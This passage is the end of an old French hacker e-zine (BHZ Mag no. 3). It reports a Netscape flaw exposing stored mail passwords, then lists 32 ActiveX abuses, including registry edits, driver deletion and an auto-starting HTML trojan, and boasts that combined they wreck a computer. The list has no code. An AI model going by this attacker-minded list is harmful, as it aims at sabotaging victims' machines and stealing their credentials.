coprrespondance sans trop d'importance. Surtout si l'on est francophone ;) 9 Faille de securite dans le mail de Netscape ********************************************* Des ingénieurs de la firme Reliable Software Technologies (RST) ont découvert qu'un défaut de Netscape permet d'accéder au mot de passe des serveurs de messagerie. Pour aller plus vite, les internautes ont pris l'habitude de mémoriser leur mot de passe de connexion à leur serveur de messagerie électronique. Une habitude qui pose un sérieux problème de sécurité si l'on en croit les informaticiens de la firme américaine RST. Ils ont découvert que les mots de passe de Netscape étaient stockés sur l'ordinateur sous une forme cryptée mais facile à déchiffrer. Suivant la version de Netscape, le mot de passe peut même être récupéré par une page Web à l'aide d'un script qui lit le contenu du fichier de préférences de l'utilisateur. Si certains de ses dirigeants se sont expliqués dans la presse américaine, la firme n'a diffusé aucun communiqué de mise en garde pour ses clients. Interrogé par le Wall Street Journal, un responsable de Netscape a expliqué que le mode de protection du mot de passe avait été conçu pour permettre aux experts de retrouver un mot de passe oublié par l'internaute. Grave erreur, affirme RST, qui souligne que les hackers et autres pirates sont, eux aussi, des experts informatiques. Les ingénieurs décrivent la méthode qui relève d'un simple jeu de permutation de caractères comme les enfants le pratiquent souvent pour échanger des secrets. La récupération d'un mot de passe à l'insu de l'internaute peut engendrer de graves conséquences. Le pirate peut facilement se faire passer pour la victime et lire ou écrire du courrier sous son nom. De plus, les gens ont la mauvaise habitude d'utiliser le même mot de passe pour des logiciels et activités différentes. Mettre la main dessus permettra par exemple de pénétrer dans le réseau d'une entreprise. En attendant que Netscape revoie sa copie, la seule protection est de désactiver l'enregistrement du mot de passe par défaut. Il faudra donc le communiquer au logiciel à chaque tentative de lecture de la boite aux lettres électronique. Un petit désagrément qui se paie par une sécurité accrue. 10 la faille ActiveX (32 facons de l'utiliser) ============================================== 1] Ecrire dans la base de registre ================================ 2] Detruire qquechose dans la base de registre ====================================== 3] Crée un fichier .bat ===================== 4] Crée un raccourci URL sur le bureau ================================== 5] Nettoyer le menu de demarrer>executer =============================== 6] Masker l'icone de la connection a internet en bas ===================== 7] Enlever les programmes qui s'executent dans le dossier demarrage ========================================================= 8] Masquer le nom du dernier utilisateur de Windoze ==================================================== 9] Modifier le nom de l'ordinateur ================================= 10] Enlever la fleche sur les fichiers qui sont en raccourcis ============================================== 11] Actualiser avec la touche F5 ============================ 12] Choisir le + petit password possible pour une "session" windoz =========================================================== 13] Enlever Demarrer-programmes-commande ms$ dos ====================================== 14] Masquer le boutton du fichier sys =============================== 15] Detruire l'historique de IE =================================== 16] Crée un trojan en HTML avec un lancement automatic au chargement de windoz98 ===================================================================== 17] Detruire les pilotes de la souris ================================== 18] Detruire les pilotes de l'imprimante ========================= 19] Detruire les pilotes des ports com1-com2 ================================= 20] Detruire les pilotes du clavier ========================== 21] Detruire les pilotes du modem ========================= 22] Dertruire les pilotes media ============================== 23] Detruire les pilotes du moniteur =============================== 24] Detruire le pilote du HD =================================== 25] Nettoyer la memo cache de netscape ========================================== 26] Enlever Nuke naber ===================== 27] Detruire la config.de connect ================================= 28] Enlever le menu demarrer>rechercher ==================================== 29] Enlever le menu demarrer>documents ===================================== 30] Enlever l'option demarrer>executer ==================================== 31] Enlever l'option demarrer>arreter ===================================== 32] enlever le menu -Favoris ============================= Mais on peut bien sur tous les combiner et creer un fichier HTML qui nique entierement l'ordi. Je suppose que vous avez compris comment ca marche.... _________________________________ -------------------------- __________________________________ Et voila le n0 3 de BHZ Mag est deja fini ! Si vous le trouvez assez court dites-vous que c'est parce que je voulais le finir avant l'an 2mil.Si y'a des articles que vous trouvez chiants,si vous voulez ecrire un artcile ou me dire que je suis genial,envoyez un email a asmodeus@mail.be C'est le premier numero de BHZ Mag qui n'est pas entierement fait par AsmodeuS !! En effet il y a un article (le 2) qui a ete ecrit par Greven. Tous les autres articles ont bien entendus ete ecrits par Asmodeus. The_End_Of_The_Zine_BHZ_Mag_N0_3_. *************************************************************************************************